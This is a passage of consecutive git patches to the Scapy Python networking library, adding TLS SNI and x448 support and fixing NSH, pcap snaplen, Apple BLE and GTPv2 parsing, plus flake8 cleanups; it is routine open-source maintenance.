0789cab2497..7a6ad603c70 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -69,7 +69,7 @@ class TLSClientAutomaton(_TLSAutomaton): _'mycert' and 'mykey' may be provided as filenames. They will be used in the handshake, should the server ask for client authentication. - _'server_name' does not need to be set. + _'server_name' is the SNI. It does not need to be set. _'client_hello' may hold a TLSClientHello or SSLv2ClientHello to be sent to the server. This is particularly useful for extensions tweaking. _'version' is a quicker way to advertise a protocol version ("sslv2", @@ -93,7 +93,6 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, super(TLSClientAutomaton, self).parse_args(mycert=mycert, mykey=mykey, **kargs) - self.remote_name = None tmp = socket.getaddrinfo(server, dport) try: if ':' in server: @@ -101,12 +100,11 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, else: inet_pton(socket.AF_INET, server) except Exception: - self.remote_name = socket.getfqdn(server) - if self.remote_name != server: - tmp = socket.getaddrinfo(self.remote_name, dport) + remote_name = socket.getfqdn(server) + if remote_name != server: + tmp = socket.getaddrinfo(remote_name, dport) - if server_name: - self.remote_name = server_name + self.remote_name = server_name self.remote_family = tmp[0][0] self.remote_ip = tmp[0][4][0] self.remote_port = dport diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index 118f510a475..156ed0ee1e1 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -411,7 +411,7 @@ def should_handle_Alert_from_ClientCertificate(self): @ATMT.state() def HANDLED_ALERT_FROM_CLIENTCERTIFICATE(self): self.vprint("Received Alert message instead of ClientKeyExchange!") - self.cur_pkt.show() + self.vprint(self.cur_pkt.mysummary()) raise self.CLOSE_NOTIFY() @ATMT.condition(HANDLED_CLIENTCERTIFICATE, prio=3) @@ -460,7 +460,7 @@ def should_handle_Alert_from_ClientKeyExchange(self): @ATMT.state() def HANDLED_ALERT_FROM_CLIENTKEYEXCHANGE(self): self.vprint("Received Alert message instead of ChangeCipherSpec!") - self.cur_pkt.show() + self.vprint(self.cur_pkt.mysummary()) raise self.CLOSE_NOTIFY() @ATMT.condition(HANDLED_CERTIFICATEVERIFY, prio=3) @@ -853,7 +853,7 @@ def tls13_should_handle_Alert_from_ClientCertificate(self): @ATMT.state() def TLS13_HANDLED_ALERT_FROM_CLIENTCERTIFICATE(self): self.vprint("Received Alert message instead of ClientKeyExchange!") - self.cur_pkt.show() + self.vprint(self.cur_pkt.mysummary()) raise self.CLOSE_NOTIFY() # For Middlebox compatibility (see RFC8446, appendix D.4) diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index e96ecdc4fe4..505e9155cb8 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -63,11 +63,6 @@ class _TLSEncryptedContent(Raw, _GenericTLSSessionInheritance): name = "Encrypted Content" match_subclass = True - def mysummary(self): - s = _GenericTLSSessionInheritance.mysummary(self) - s += " / " + self.name - return s - class _TLSMsgListField(PacketListField): """ @@ -724,7 +719,7 @@ def mysummary(self): s = super(TLS, self).mysummary() if self.msg: s += " / " - s += " / ".join(x.name for x in self.msg) + s += " / ".join(getattr(x, "_name", x.name) for x in self.msg) return s ############################################################################### @@ -783,6 +778,9 @@ class TLSAlert(_GenericTLSSessionInheritance): fields_desc = [ByteEnumField("level", None, _tls_alert_level), ByteEnumField("descr", None, _tls_alert_description)] + def mysummary(self): + return self.sprintf("Alert %level%: %desc%") + def post_dissection_tls_session_update(self, msg_str): pass diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 62dd4f264a5..96282d83927 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -998,7 +998,8 @@ def show2(self): s.wcs = wcs_snap def mysummary(self): - return "TLS %s" % repr(self.tls_session) + return "TLS %s / %s" % (repr(self.tls_session), + getattr(self, "_name", self.name)) ############################################################################### diff --git a/test/tls/example_client.py b/test/tls/example_client.py index b20a59aa8cd..b1a753f136a 100755 --- a/test/tls/example_client.py +++ b/test/tls/example_client.py @@ -8,9 +8,10 @@ Default protocol version is TLS 1.3. """ +import logging import os +import socket import sys -import logging logger = logging.getLogger("scapy") logger.addHandler(logging.StreamHandler()) @@ -40,6 +41,8 @@ help="File to write a ticket to (for TLS 1.3)") parser.add_argument("--res_master", help="Resumption master secret (for TLS 1.3)") +parser.add_argument("--sni", + help="Server Name Indication") parser.add_argument("--debug", action="store_const", const=5, default=0, help="Enter debug mode") parser.add_argument("server", nargs="?", default="127.0.0.1", @@ -68,8 +71,9 @@ else: ch = None -server_name = None -if args.server: +server_name = args.sni +# If server name is unknown, try server +if not server_name and args.server: try: inet_aton(args.server) except socket.error: From 704a77c5d168f29f8641e70cf4bb72083e378077 Mon Sep 17 00:00:00 2001 From: gpotter Date: Fri, 8 May 2020 16:47:26 +0200 Subject: [PATCH 0140/1632] Fix TLS <= 1.2 RSA --- scapy/layers/tls/keyexchange.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index 97071955167..f23a4b341f9 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -880,7 +880,7 @@ class EncryptedPreMasterSecret(_GenericTLSSessionInheritance): @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): - if 'tls_session' in kargs: + if _pkt and 'tls_session' in kargs: s = kargs['tls_session'] if s.server_tmp_rsa_key is None and s.server_rsa_key is None: return _UnEncryptedPreMasterSecret From 41054c119cb9295c7a4f028bfd555d32fd313924 Mon Sep 17 00:00:00 2001 From: Sa Pham Date: Mon, 10 Feb 2020 15:33:18 +0900 Subject: [PATCH 0141/1632] Use nextproto property instead of nextprotocol --- scapy/contrib/nsh.py | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/scapy/contrib/nsh.py b/scapy/contrib/nsh.py index bda25ff2f67..7f5fcf99933 100644 --- a/scapy/contrib/nsh.py +++ b/scapy/contrib/nsh.py @@ -85,11 +85,11 @@ def mysummary(self): bind_layers(Ether, NSH, {'type': 0x894F}, type=0x894F) -bind_layers(VXLAN, NSH, {'flags': 0xC, 'nextprotocol': 4}, nextprotocol=4) +bind_layers(VXLAN, NSH, {'flags': 0xC, 'nextproto': 4}, nextproto=4) bind_layers(GRE, NSH, {'proto': 0x894F}, proto=0x894F) -bind_layers(NSH, IP, {'nextprotocol': 1}, nextprotocol=1) -bind_layers(NSH, IPv6, {'nextprotocol': 2}, nextprotocol=2) -bind_layers(NSH, Ether, {'nextprotocol': 3}, nextprotocol=3) -bind_layers(NSH, NSH, {'nextprotocol': 4}, nextprotocol=4) -bind_layers(NSH, MPLS, {'nextprotocol': 5}, nextprotocol=5) +bind_layers(NSH, IP, nextproto=1) +bind_layers(NSH, IPv6, nextproto=2) +bind_layers(NSH, Ether, nextproto=3) +bind_layers(NSH, NSH, nextproto=4) +bind_layers(NSH, MPLS, nextproto=5) From 5eee172cb6e1be3e257fdc2afadc0bf07e8d1b73 Mon Sep 17 00:00:00 2001 From: Pierre Lalet Date: Fri, 8 May 2020 17:57:47 +0200 Subject: [PATCH 0142/1632] Fix test --- test/contrib/nsh.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/contrib/nsh.uts b/test/contrib/nsh.uts index 2c7e91f7b21..5c8f3ac6e4b 100644 --- a/test/contrib/nsh.uts +++ b/test/contrib/nsh.uts @@ -1,7 +1,7 @@ + Basic Layer Tests = Build a NSH over NSH packet with SPI=42, and SI=1 -raw(NSH(spi=42, si=1)/NSH()) == b'\x0f\xc6\x01\x03\x00\x00*\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\xc6\x01\x03\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +raw(NSH(spi=42, si=1)/NSH()) == b'\x0f\xc6\x01\x04\x00\x00*\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\xc6\x01\x03\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' = Build a NSH with Fixed context headers raw(NSH(ttl=25, spi=55, si=34, context_header=b"\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\xff\xff\xff\xff")) == b'\x06F\x01\x03\x00\x007"\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\xff\xff\xff\xff' From 3ae63e3e3aaa98b792100e9068b2547d090d25a9 Mon Sep 17 00:00:00 2001 From: Chema Gonzalez Date: Mon, 6 Apr 2020 11:31:36 -0700 Subject: [PATCH 0143/1632] add snaplen to both PcapReader and PcapWriter Tested: Before: ``` $ cat filter.py \#!/usr/bin/env python3 import sys from scapy.utils import PcapReader, PcapWriter from scapy.all import wrpcap, Ether, IP, ICMP \# assume `./filter.py in.pcap out.pcap` infile = sys.argv[1] outfile = sys.argv[2] reader = PcapReader(infile) \# TODO: keep snaplen for filters writer = PcapWriter(outfile, linktype=reader.linktype, sync=True) for packet in reader: writer.write(packet) reader.close() writer.close() ``` ``` $ ./filter.py /tmp/oneb.pcap /tmp/bar.pcap $ xxd /tmp/oneb.pcap > /tmp/oneb.pcap.txt $ xxd /tmp/bar.pcap > /tmp/bar.pcap.txt $ diff /tmp/oneb.pcap.txt /tmp/bar.pcap.txt 2c2 < 00000010: 0000 0400 0100 0000 eda3 7e5e 3042 0500 ..........~^0B.. --- > 00000010: ffff 0000 0100 0000 eda3 7e5e 3042 0500 ..........~^0B.. ``` After: ``` $ cat filter2.py \#!/usr/bin/env python3 import sys from scapy.utils import PcapReader, PcapWriter from scapy.all import wrpcap, Ether, IP, ICMP \# assume `./filter.py in.pcap out.pcap` infile = sys.argv[1] outfile = sys.argv[2] reader = PcapReader(infile) writer = PcapWriter(outfile, linktype=reader.linktype, sync=True, snaplen=reader.snaplen) for packet in reader: writer.write(packet) reader.close() writer.close() ``` ``` $ ./filter2.py /tmp/oneb.pcap /tmp/bar2.pcap $ xxd /tmp/bar2.pcap > /tmp/bar2.pcap.txt $ diff /tmp/oneb.pcap.txt /tmp/bar2.pcap.txt $ ``` --- scapy/utils.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index d13fb1bb58c..9177017eb20 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1031,6 +1031,7 @@ def __init__(self, filename, fdesc, magic): self.endian + "HHIIII", hdr ) self.linktype = linktype + self.snaplen = snaplen def __iter__(self): return self @@ -1331,7 +1332,7 @@ class RawPcapWriter: """A stream PCAP writer with more control than wrpcap()""" def __init__(self, filename, linktype=None, gz=False, endianness="", - append=False, sync=False, nano=False): + append=False, sync=False, nano=False, snaplen=MTU): """ :param filename: the name of the file to write packets to, or an open, writable file-like object. @@ -1348,6 +1349,7 @@ def __init__(self, filename, linktype=None, gz=False, endianness="", """ self.linktype = linktype + self.snaplen = snaplen self.header_present = 0 self.append = append self.gz = gz @@ -1381,7 +1383,7 @@ def _write_header(self, pkt): return self.f.write(struct.pack(self.endian + "IHHIIII", 0xa1b23c4d if self.nano else 0xa1b2c3d4, # noqa: E501 - 2, 4, 0, 0, MTU, self.linktype)) + 2, 4, 0, 0, self.snaplen, self.linktype)) self.f.flush() def write(self, pkt): From 7e11d6519badacd411373f3db49610e49b35341e Mon Sep 17 00:00:00 2001 From: Gabriel Date: Sat, 9 May 2020 20:19:56 +0200 Subject: [PATCH 0144/1632] [TLS 1.3] x448 support (#2633) * Add support for curve x448 * Add x448 tests * Credit Romain Perez Co-authored-by: rperez --- scapy/layers/tls/automaton_cli.py | 6 +++--- scapy/layers/tls/automaton_srv.py | 4 ++-- scapy/layers/tls/handshake.py | 1 + scapy/layers/tls/keyexchange.py | 1 + scapy/layers/tls/keyexchange_tls13.py | 26 +++++++++++++++++--------- scapy/layers/tls/record.py | 4 +++- scapy/layers/tls/record_tls13.py | 1 + scapy/layers/tls/session.py | 1 + test/tls/example_client.py | 2 ++ test/tls/tests_tls_netaccess.uts | 5 +++++ 10 files changed, 36 insertions(+), 15 deletions(-) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 7a6ad603c70..7ff76a3a972 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -1,14 +1,14 @@ # This file is part of Scapy # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury +# 2019 Romain Perez # This program is published under a GPLv2 license """ TLS client automaton. This makes for a primitive TLS stack. Obviously you need rights for network access. -We support versions SSLv2 to TLS 1.2, along with many features. -There is no session resumption mechanism for now. +We support versions SSLv2 to TLS 1.3, along with many features. In order to run a client to tcp/50000 with one cipher suite of your choice: > from scapy.all import * @@ -981,7 +981,7 @@ def TLS13_START(self): @ATMT.condition(TLS13_START) def tls13_should_add_ClientHello(self): # we have to use the legacy, plaintext TLS record here - supported_groups = ["secp256r1", "secp384r1"] + supported_groups = ["secp256r1", "secp384r1", "x448"] if conf.crypto_valid_advanced: supported_groups.append("x25519") self.add_record(is_tls13=False) diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index 156ed0ee1e1..4a2251b23fb 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -1,14 +1,14 @@ # This file is part of Scapy # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury +# 2019 Romain Perez # This program is published under a GPLv2 license """ TLS server automaton. This makes for a primitive TLS stack. Obviously you need rights for network access. -We support versions SSLv2 to TLS 1.2, along with many features. -There is no session resumption mechanism for now. +We support versions SSLv2 to TLS 1.3, along with many features. In order to run a server listening on tcp/4433: > from scapy.all import * diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 22c6e956da8..d7a60f734ca 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -1,6 +1,7 @@ # This file is part of Scapy # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury +# 2019 Romain Perez # This program is published under a GPLv2 license """ diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index f23a4b341f9..5172af43f16 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -1,6 +1,7 @@ # This file is part of Scapy # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury +# 2019 Romain Perez # This program is published under a GPLv2 license """ diff --git a/scapy/layers/tls/keyexchange_tls13.py b/scapy/layers/tls/keyexchange_tls13.py index 6710af4e5b9..97b63465543 100644 --- a/scapy/layers/tls/keyexchange_tls13.py +++ b/scapy/layers/tls/keyexchange_tls13.py @@ -1,5 +1,6 @@ # This file is part of Scapy # Copyright (C) 2017 Maxence Tury +# 2019 Romain Perez # This program is published under a GPLv2 license """ @@ -26,6 +27,7 @@ from cryptography.hazmat.primitives.asymmetric import dh, ec if conf.crypto_valid_advanced: from cryptography.hazmat.primitives.asymmetric import x25519 + from cryptography.hazmat.primitives.asymmetric import x448 class KeyShareEntry(Packet): @@ -67,16 +69,19 @@ def create_privkey(self): pubkey = privkey.public_key() self.key_exchange = pubkey.public_numbers().y elif self.group in _tls_named_curves: - if _tls_named_curves[self.group] == "x25519": + if _tls_named_curves[self.group] in ["x25519", "x448"]: if conf.crypto_valid_advanced: - privkey = x25519.X25519PrivateKey.generate() + if _tls_named_curves[self.group] == "x25519": + privkey = x25519.X25519PrivateKey.generate() + else: + privkey = x448.X448PrivateKey.generate() self.privkey = privkey pubkey = privkey.public_key() self.key_exchange = pubkey.public_bytes( serialization.Encoding.Raw, serialization.PublicFormat.Raw ) - elif _tls_named_curves[self.group] != "x448": + else: curve = ec._CURVE_TYPES[_tls_named_curves[self.group]]() privkey = ec.generate_private_key(curve, default_backend()) self.privkey = privkey @@ -116,11 +121,14 @@ def register_pubkey(self): public_numbers = dh.DHPublicNumbers(self.key_exchange, pn) self.pubkey = public_numbers.public_key(default_backend()) elif self.group in _tls_named_curves: - if _tls_named_curves[self.group] == "x25519": + if _tls_named_curves[self.group] in ["x25519", "x448"]: if conf.crypto_valid_advanced: - import_point = x25519.X25519PublicKey.from_public_bytes + if _tls_named_curves[self.group] == "x25519": + import_point = x25519.X25519PublicKey.from_public_bytes + else: + import_point = x448.X448PublicKey.from_public_bytes self.pubkey = import_point(self.key_exchange) - elif _tls_named_curves[self.group] != "x448": + else: curve = ec._CURVE_TYPES[_tls_named_curves[self.group]]() try: # cryptography >= 2.5 import_point = ec.EllipticCurvePublicKey.from_encoded_point # noqa: E501 @@ -203,7 +211,7 @@ def post_build(self, pkt, pay): if group_name in six.itervalues(_tls_named_ffdh_groups): pms = privkey.exchange(pubkey) elif group_name in six.itervalues(_tls_named_curves): - if group_name == "x25519": + if group_name in ["x25519", "x448"]: pms = privkey.exchange(pubkey) else: pms = privkey.exchange(ec.ECDH(), pubkey) @@ -226,7 +234,7 @@ def post_dissection(self, r): if group_name in six.itervalues(_tls_named_ffdh_groups): pms = privkey.exchange(pubkey) elif group_name in six.itervalues(_tls_named_curves): - if group_name == "x25519": + if group_name in ["x25519", "x448"]: pms = privkey.exchange(pubkey) else: pms = privkey.exchange(ec.ECDH(), pubkey) @@ -237,7 +245,7 @@ def post_dissection(self, r): if group_name in six.itervalues(_tls_named_ffdh_groups): pms = privkey.exchange(pubkey) elif group_name in six.itervalues(_tls_named_curves): - if group_name == "x25519": + if group_name in ["x25519", "x448"]: pms = privkey.exchange(pubkey) else: pms = privkey.exchange(ec.ECDH(), pubkey) diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index 505e9155cb8..32fb5e1eb6b 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -1,6 +1,8 @@ # This file is part of Scapy # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard -# 2015, 2016, 2017 Maxence Tury +# 2015, 2016, 2017 Maxence Tury +# 2019 Romain Perez +# 2019 Gabriel Potter # This program is published under a GPLv2 license """ diff --git a/scapy/layers/tls/record_tls13.py b/scapy/layers/tls/record_tls13.py index 7e2211092e9..1147159586e 100644 --- a/scapy/layers/tls/record_tls13.py +++ b/scapy/layers/tls/record_tls13.py @@ -1,5 +1,6 @@ # This file is part of Scapy # Copyright (C) 2017 Maxence Tury +# 2019 Romain Perez # This program is published under a GPLv2 license """ diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 96282d83927..df818b21189 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -1,6 +1,7 @@ # This file is part of Scapy # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury +# 2019 Romain Perez # This program is published under a GPLv2 license """ diff --git a/test/tls/example_client.py b/test/tls/example_client.py index b1a753f136a..c6792dd942a 100755 --- a/test/tls/example_client.py +++ b/test/tls/example_client.py @@ -43,6 +43,7 @@ help="Resumption master secret (for TLS 1.3)") parser.add_argument("--sni", help="Server Name Indication") +parser.add_argument("--curve", help="ECC group to advertise") parser.add_argument("--debug", action="store_const", const=5, default=0, help="Enter debug mode") parser.add_argument("server", nargs="?", default="127.0.0.1", @@ -94,6 +95,7 @@ resumption_master_secret=args.res_master, session_ticket_file_in=args.session_ticket_file_in, session_ticket_file_out=args.session_ticket_file_out, + curve=args.curve, debug=args.debug) t.run() diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index ba61b4261ba..8cbb4b55a2f 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -322,6 +322,11 @@ test_tls_client("1303", "0304") test_tls_client("1305", "0304") += Testing TLS server and client with TLS 1.3 and TLS_AES_128_CCM_8_SHA256 and x448 +~ crypto_advanced + +test_tls_client("1305", "0304", curve="x448") + = Testing TLS server and client with TLS 1.3 and a retry ~ crypto_advanced From b1957ed1740b87df95fb13fc4a21713c9889c608 Mon Sep 17 00:00:00 2001 From: Michael Farrell Date: Mon, 11 May 2020 14:05:55 +1000 Subject: [PATCH 0145/1632] Add IDs for Apple BTLE overflow area --- doc/scapy/layers/bluetooth.rst | 2 ++ scapy/contrib/ibeacon.py | 14 +++++++++++--- test/contrib/ibeacon.uts | 15 +++++++++++++++ 3 files changed, 28 insertions(+), 3 deletions(-) diff --git a/doc/scapy/layers/bluetooth.rst b/doc/scapy/layers/bluetooth.rst index b66a55b9146..f87184ef00a 100644 --- a/doc/scapy/layers/bluetooth.rst +++ b/doc/scapy/layers/bluetooth.rst @@ -567,9 +567,11 @@ also advertised within their manufacturer-specific data field, including: * AirPods * `Handoff`__ * Nearby + * `Overflow area`__ __ https://en.wikipedia.org/wiki/AirDrop __ https://en.wikipedia.org/wiki/OS_X_Yosemite#Continuity +__ https://developer.apple.com/documentation/corebluetooth/cbperipheralmanager/1393252-startadvertising For compatibility with these other broadcasts, Apple BLE frames in Scapy are layered on top of ``Apple_BLE_Submessage`` and ``Apple_BLE_Frame``: diff --git a/scapy/contrib/ibeacon.py b/scapy/contrib/ibeacon.py index fddae43190a..1818cecc209 100644 --- a/scapy/contrib/ibeacon.py +++ b/scapy/contrib/ibeacon.py @@ -18,8 +18,8 @@ """ -from scapy.fields import ByteEnumField, LenField, PacketListField, \ - ShortField, SignedByteField, UUIDField +from scapy.fields import ByteEnumField, ConditionalField, LenField, \ + PacketListField, ShortField, SignedByteField, UUIDField from scapy.layers.bluetooth import EIR_Hdr, EIR_Manufacturer_Specific_Data, \ LowEnergyBeaconHelper from scapy.packet import bind_layers, Packet @@ -35,6 +35,7 @@ class Apple_BLE_Submessage(Packet, LowEnergyBeaconHelper): name = "Apple BLE submessage" fields_desc = [ ByteEnumField("subtype", None, { + 0x01: "overflow", 0x02: "ibeacon", 0x05: "airdrop", 0x07: "airpods", @@ -43,11 +44,18 @@ class Apple_BLE_Submessage(Packet, LowEnergyBeaconHelper): 0x0c: "handoff", 0x10: "nearby", }), - LenField("len", None, fmt="B") + ConditionalField( + # "overflow" messages omit `len` field + LenField("len", None, fmt="B"), + lambda pkt: pkt.subtype != 0x01 + ), ] def extract_padding(self, s): # Needed to end each EIR_Element packet and make PacketListField work. + if self.subtype == 0x01: + # Overflow messages are always 16 bytes. + return s[:16], s[16:] return s[:self.len], s[self.len:] # These methods are here in case you only want to send 1 submessage. diff --git a/test/contrib/ibeacon.uts b/test/contrib/ibeacon.uts index df9221db947..a935980b7b8 100644 --- a/test/contrib/ibeacon.uts +++ b/test/contrib/ibeacon.uts @@ -68,3 +68,18 @@ assert p[HCI_LE_Meta_Advertising_Report].addr == 'd6:ee:d4:16:ed:fc' assert len(p[Apple_BLE_Frame].plist) == 1 assert p[IBeacon_Data].uuid == UUID('b9407f30-f5f8-466e-aff9-25556b57fe6d') ++ Overflow area + += Basic overflow area packet + +d = hex_bytes('14ff4c000100000000000000000000000000000080') +p = EIR_Hdr(d) + +assert raw(p) == d +assert len(p[Apple_BLE_Frame].plist) == 1 +assert p[Apple_BLE_Submessage].subtype == 0x01 +assert p[Apple_BLE_Submessage].len == None + +payload = p[Apple_BLE_Submessage].payload +assert isinstance(payload, Raw) +assert raw(payload) == hex_bytes('00000000000000000000000000000080') From 9a92c8bb2a0fdb819958aeb41f14765c11c12b3d Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Tue, 12 May 2020 14:18:58 -0400 Subject: [PATCH 0146/1632] Fix PCO_PduSessionId --- scapy/contrib/gtp_v2.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 0e57e2e8932..1f367760a83 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -1058,8 +1058,7 @@ class PCO_PDU_Session_Id(PCO_Option): name = "PCO PDU session ID" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), ByteField("length", 0), - PacketListField("Options", None, PCO_option_dispatcher, - length_from=len_options)] + ShortField("PduSessionId", 1)] class PCO_5GSM_Cause_Value(PCO_Option): From 88ce0bda08609fc3f444f4c1ecd46104e2c85b2a Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Tue, 12 May 2020 14:31:58 -0400 Subject: [PATCH 0147/1632] Update gtp_v2.py --- scapy/contrib/gtp_v2.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 1f367760a83..1d68c5eec97 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -1058,7 +1058,8 @@ class PCO_PDU_Session_Id(PCO_Option): name = "PCO PDU session ID" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), ByteField("length", 0), - ShortField("PduSessionId", 1)] + ConditionalField(ShortField("PduSessionId", 1), + lambda pkt: pkt.length)] class PCO_5GSM_Cause_Value(PCO_Option): From 27a3ba4764e1acbe4b6f6bcc0158e89efc2c5505 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Tue, 12 May 2020 15:47:08 -0400 Subject: [PATCH 0148/1632] Update gtp_v2.py --- scapy/contrib/gtp_v2.py | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 1d68c5eec97..7aacc3d6311 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -1057,9 +1057,8 @@ class PCO_P_CSCF_Re_selection_Support(PCO_Option): class PCO_PDU_Session_Id(PCO_Option): name = "PCO PDU session ID" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), - ByteField("length", 0), - ConditionalField(ShortField("PduSessionId", 1), - lambda pkt: pkt.length)] + ByteField("length", 1), + ShortField("PduSessionId", 1)] class PCO_5GSM_Cause_Value(PCO_Option): From 9b9143429c7bd5b2a511df3ebfebcbe43c3ad514 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Tue, 12 May 2020 16:31:56 -0400 Subject: [PATCH 0149/1632] Update gtp_v2.py --- scapy/contrib/gtp_v2.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 7aacc3d6311..7530f680805 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -1058,7 +1058,7 @@ class PCO_PDU_Session_Id(PCO_Option): name = "PCO PDU session ID" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), ByteField("length", 1), - ShortField("PduSessionId", 1)] + ByteField("PduSessionId", 1)] class PCO_5GSM_Cause_Value(PCO_Option): From 533b1c3896926d77dd526a6331e37aa56dadf9e6 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 15 May 2020 15:02:30 +0200 Subject: [PATCH 0150/1632] Fix flake8 errors --- scapy/arch/solaris.py | 6 +-- scapy/arch/unix.py | 6 +-- scapy/config.py | 9 ++-- scapy/contrib/automotive/ecu.py | 18 ++++---- scapy/contrib/http2.py | 4 +- scapy/contrib/openflow.py | 2 +- scapy/contrib/openflow3.py | 2 +- scapy/layers/dot11.py | 68 ++++++++++--------------------- scapy/layers/eap.py | 12 +++--- scapy/layers/inet.py | 6 +-- scapy/layers/inet6.py | 22 +++++----- scapy/layers/sixlowpan.py | 4 +- scapy/layers/tls/automaton_srv.py | 8 ++-- scapy/layers/tls/crypto/suites.py | 4 +- scapy/layers/tls/session.py | 4 +- scapy/main.py | 12 +++--- scapy/pipetool.py | 8 ++-- scapy/tools/UTscapy.py | 41 ++++++++++--------- scapy/utils.py | 14 ++++--- scapy/utils6.py | 6 +-- 20 files changed, 117 insertions(+), 139 deletions(-) diff --git a/scapy/arch/solaris.py b/scapy/arch/solaris.py index 3ae20917966..6083af4f9b1 100644 --- a/scapy/arch/solaris.py +++ b/scapy/arch/solaris.py @@ -18,9 +18,9 @@ # From sys/sockio.h and net/if.h SIOCGIFHWADDR = 0xc02069b9 # Get hardware address -from scapy.arch.pcapdnet import * # noqa: F401, F403 -from scapy.arch.unix import * # noqa: F401, F403 -from scapy.arch.common import get_if_raw_hwaddr # noqa: F401, F403 +from scapy.arch.pcapdnet import * # noqa: F401, F403, E402 +from scapy.arch.unix import * # noqa: F401, F403, E402 +from scapy.arch.common import get_if_raw_hwaddr # noqa: F401, F403, E402 def get_working_if(): diff --git a/scapy/arch/unix.py b/scapy/arch/unix.py index dd2aa40266c..e849555f0b8 100644 --- a/scapy/arch/unix.py +++ b/scapy/arch/unix.py @@ -212,9 +212,9 @@ def in6_getifaddr(): # Get the list of network interfaces splitted_line = [] - for l in f: - if "flags" in l: - iface = l.split()[0].rstrip(':') + for line in f: + if "flags" in line: + iface = line.split()[0].rstrip(':') splitted_line.append(iface) else: # FreeBSD, NetBSD or Darwin diff --git a/scapy/config.py b/scapy/config.py index 8259a873782..952ef056667 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -193,7 +193,8 @@ def __init__(self): self.ldict = {} def __repr__(self): - return "\n".join("%-20s: %s" % (l.__name__, l.name) for l in self) + return "\n".join("%-20s: %s" % (layer.__name__, layer.name) + for layer in self) def register(self, layer): self.append(layer) @@ -214,9 